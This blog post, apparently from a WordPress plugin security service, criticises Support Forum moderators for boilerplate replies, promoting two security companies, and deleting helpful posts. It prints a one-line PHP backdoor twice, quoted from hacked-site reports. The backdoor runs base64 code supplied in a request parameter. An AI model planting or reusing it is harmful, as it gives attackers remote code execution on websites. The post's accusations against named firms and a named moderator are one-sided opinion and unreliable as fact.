One of the ways that we keep track of vulnerabilities in WordPress plugins for our service is by monitoring the WordPress Support Forum for related topics. What we have seen is that unfortunately that often isn’t place where people with security issues can get real help, instead it used by the moderators of the forum to promote hiring certain security companies. Occasionally we have attempted to provide some help, but that has been severely hampered by the moderators (a situation that apparently has occurred for others as well).

As an example of that was a thread was started last week with the following:

Hello,

We have a WordPress.org website hosted into a KVM. We noticed that we suffer regularly from unauthorized uploads of scrip exploits (copied below), that use the WordPress files admin-post.php and admin-ajax.php to upload those scripts.

I deleted the exploit files from the server. I set (again) the WordPress folders to 755 and files to 644. I wonder if there is anything you can do to avoid those WordPress files to be used to upload exploits into a server.

Looking forward to your reply,

Rgs

IM

Web referer URL :
Local IP : xxx
Web upload script user : nobody (99)
Web upload script owner: xxxxxx (1001)
Web upload script path : /home/xxxxxx/public_html/wp-admin/admin-ajax.php
Web upload script URL : http://xxxxxxx/wp-admin/admin-ajax.php
Remote IP : 205.185.123.173 FrantechSolutions
Deleted : No
Quarantined : No

———– SCAN REPORT ———–
TimeStamp:
(/usr/sbin/cxs –nobayes –cgi –defapache nobody –doptions Mv –exploitscan –nofallback –filemax 10000 –noforce –html –mail root –options mMOLfSGchexdnwZDRru –qoptions Mv –quiet –sizemax 1000000 –smtp –ssl –summary –sversionscan –timemax 30 –nounofficial –novirusscan /tmp/20180917-015445-W59BpduidjdfatuYgCKlMwAAABg-file-2LHfFB)

‘/tmp/20180917-015445-W59BpduidjdfatuYgCKlMwAAABg-file-2LHfFB’
Known exploit = [Fingerprint Match] [RFI Exploit [P1419]]

The file the request was sent through, /wp-admin/admin-ajax.php, is what is used to process request being run through WordPress’ AJAX functionality. WordPress itself doesn’t handle uploads through that, so that would most likely be coming from a plugin, though a theme is also a possibility.

Someone responded to the requests with a message along those lines:

Do you have a list of your active plugins you could provide us? the admin-ajax.php file is used by several plugins to send ajax requests, so it could be one of your third-party plugins sending a jQuery or ajax request to a custom method which could be unsafe.

One of the moderators of the Support Forum responded after that with their standard boilerplate response:

Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

Considering that someone had already responded specifically to what was being mentioned this wasn’t a case where a moderator wanted to make sure they got a response. Not only does that not actually address at all what this person had asked about, but there are several big issues with that.

The guide that is linked to there doesn’t look at that helpful if you are actually trying to deal with a hacked website based on our years of experience (nor is it clear that the website was more broadly hacked). That might not be surprising considering that the editing history is filled with edits from people from both companies that are then cited as being ones to hire.

As will become more relevant in a second, the guide actually suggest going to the forum for help:

Leverage the Community

We often forget but we’re a community based platform, this means that if you’re in trouble someone in the community is likely to give a lending hand. A very good place to start if you’re strapped for cash or just looking for a helping hand is the WordPress.org Hacked or Malware forum.

So you are sent in a circle, the guide suggest going to the forum for help, but when you do you are pointed to the guide.

The promotion of those two companies seems to be a clear violation of the guidelines of the forum as this is the headline of one of the sections:

Do Not Advertise or Promote Products

It’s also worth noting that neither of those companies is all that reputable, well known, sure, but not reputable. Sucuri is company that we have been brought in on a regular basis over at our main business to re-clean websites after they haven’t bothered to do things right. It would be hard to call Wordfence reputable when they lie all the time. It also worth noting those companies don’t offer to help people with hacked website on the forum from what we have seen, making the promotion of them stand out more.

After another back and forth the moderator, the moderator repeated their boilerplate text again:

There is nothing confidential or vulnerable about listing your plugins, but it matters not. You are hacked and you need to work through the recommended articles to delouse your site. Looking through infected plugins after you’ve been hacked isn’t the way to do that.

If you’ve missed my reply, here it is again:
Follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

You have not demonstrated an issue with WordPress core; Edit: Or in a plugin or theme.

Overall it seems the moderator doesn’t actually understand what is happening here, which seems like a good reason for them not to have participated and left it to others that were more knowledgeable. That they would do that anyway is in line with what we have seen with people on the WordPress side of things, not just the forum moderators, it seems to explain a lot of what is wrong when it comes to security on the WordPress side.

There isn’t any indication that there is an infected plugin. While it is possible a hacker could go to the trouble of adding malicious code that handles additional file uploads through WordPress AJAX functionality, that seems unnecessarily complicated and would be out of line with anything we have seen. What seems more likely is that there is a plugin with insecure file upload capability that is ability that is being abused.

It isn’t even clear that the website is hacked beyond the files being uploaded that appear to be being caught at some point, so it might be the main or only issue is the file upload issue. That would be a good reason to post on the support forum to “leverage the community”, something that this moderator doesn’t seem to be too interested in, instead promoting those companies.

We responded with the following offering to help and noting to the moderator issues with their reply:

@itmonitor
The request going through /wp-admin/admin-ajax.php means it is being run through WordPress’ AJAX functionality. The WordPress core software doesn’t handle file uploads through that. That would likely be due to a plugin, though it could be through a theme.

If you can list of the active plugins on the website we can review any that are available on the Plugin Directory to see if any of them have file upload capability that isn’t properly secured. There isn’t a security risk in listing the plugins.

@anevins
It actually seems what they are trying to do here is appropriate, as if the file upload issue is the cause of their issue (and not result of it), then figuring out how the file uploads are occurring is parting of cleaning things up (based on what they described so far it might be the only issue).

While the guide you are linking doesn’t seem to be very helpful, it specifically suggest coming to this forum for help:

We often forget but we’re a community based platform, this means that if you’re in trouble someone in the community is likely to give a lending hand. A very good place to start if you’re strapped for cash or just looking for a helping hand is the WordPress.org Hacked or Malware forum.

So pushing people off to that guide when they come here for help is a bit odd.

Also, please review the guidelines of this forum, as your behavior is clearly in violation of them when it comes to the guideline “Do Not Advertise or Promote Products” .

Our comment was at first held for moderation and then approved by a moderator, so it seems to have been fine. That was until another moderator Jan Dembowski, decided to delete it. What is incredible about them is that they apparently do this sort of thing enough to have gotten a public reputation for bullying, which seems like it should be hard to pull of considering how little it would seem most people would pay attention to the moderators of the forum. If that moderator an issue with that message they could have posted their own public reply for everyone to see, but the moderators have shown that they are not interested in actually having a discussion (likely due to their actions not being defensible), instead using their power to shut down others. The end result of this, whether intended is not, is that people trying to actually help are run off and the moderators can continue to promote those companies in violation of the guidelines they are supposed to be enforcing.

Moderators Make Leveraging the Community Harder

Even in one of the few instances where people were actually able to leverage the community, the moderators actually made that harder and were unable to deal with someone pointing that out.

Several weeks ago we discussed the exploitation of a vulnerability in a file created by the Duplicator plugin (doing that well before other security companies did, despite what security journalists would want you to believe) after seeing a couple of threads discussing that. There is one key difference between the two.

Here is one:

Hi,

The last couple of hours, our support has been targeted with A LOT of emails that all revolve around the same issue; a customer’s WordPress website suddenly displays the installation process.

It all seems very related to CVE-2018-12895, but this should’ve been fixed in 4.9.7, and we have customers affected by this that runs the latest version of WordPress.

We’ve had multiple reports the entire day, across multiple hosting companies in multiple datacenters with very different setups.

Is there an exploit I don’t know about?

Edit:
For all infected versions, we see a file called wp-crawl.php in the WP-root. Contents:

<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl'); ?>

And here is the other:

Notification of possibly new hack/malware:

Today our site “rebooted” to showing the install page.

In the wordpress root directory a new file appeared, “temp-crawl.php” with code:

[ Please don’t post hacking code. Thanks.]

This appears to take the contents of supplied URL parameter ‘q’, write them to a new file “tempcrawl”, execute that file, then delete the file.

I deleted temp-crawl.php but don’t know where the vulnerability was.

Currently there are zero google search results for “temp-crawl.php” so this might be something new(?)

In the second the “hacking code” has been removed. That code was this (which was captured in the email we were sent when the person first started the thread):

<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl'); ?>

It’s the same code, which is critical for connecting these two threads. By deleting that people would have had a difficult time making that connection.

We responded pointing out why this was problematic:

The code that was removed from this thread shouldn’t have been since this code couldn’t be used to hack a website and because it makes it harder for others to find this thread if they have the same issue. Since we could see that code before it was removed, we can point out that there is another thread started shortly after this one that involves files named wp-crawl.php being added to websites that have the same code in them.

That was promptly deleted. Why was it deleted? Who knows, because you wouldn’t even know by looking at the thread that it was deleted. But it appears to be a situation where one of the moderators couldn’t handle that someone would disagree with a moderator’s action (maybe it was the moderator who took action) and deleted that to cover up the situation.

To make the situation seem even odder here is what we posted in the other thread:

While you wouldn’t know it now because of yet another example of the all too common unhelpful activity by the moderators of this forum, there is another thread started shortly before yours with someone else that has a file with the same code, though in their case the file it is in is named temp-crawl.php.

That wasn’t deleted and there is a moderator replying right after us in the thread.

Who Moderates the Moderators?

It seems to us that the moderators are need of moderation themselves, the problem is that the person that is supposed to be in charge of the moderators is themselves a moderator. So they are supposed to be moderating themself?

Making this more problematic is that person is person has shown that they have problems handling themselves in a professional manner, which is clearly needed if someone is going to clean up the mess that is the moderation. Especially when this person works closely with moderators that are acting inappropriately, for example, they are member of the Plugin Directory team, whose head has acted inappropriately. It even seems that this person themselves has been a party to inappropriate behavior that has hurt the security of WordPress websites and hurt the community.

You also a situation where this person either has no idea what is going on with the moderation (despite being involved in it) or they are lying through their teeth. Here is the recent claim related to that:

People who are saying that some things we do not allow to be posted in the forums are correct. You now can see why. There is a fair amount of pretty horrible and toxic postings being made to the forums. We don’t remove words from the forums because people disagree, but we do remove those words that do not belong in a polite and decent community.

That is simply untrue, take for instance this time a moderator deleted someone just thanking us, how are those “words that do not belong in a polite and decent community”?

Or take this situation where the head of the Plugin Directory shutdown a thread for being “non-productive” because they couldn’t handle people disagreeing with their approach to something.

The reality is that moderators often abuse their power in the Support Forum in a way that leaves the rest of the community at a disadvantage with nothing to positive to balance that out.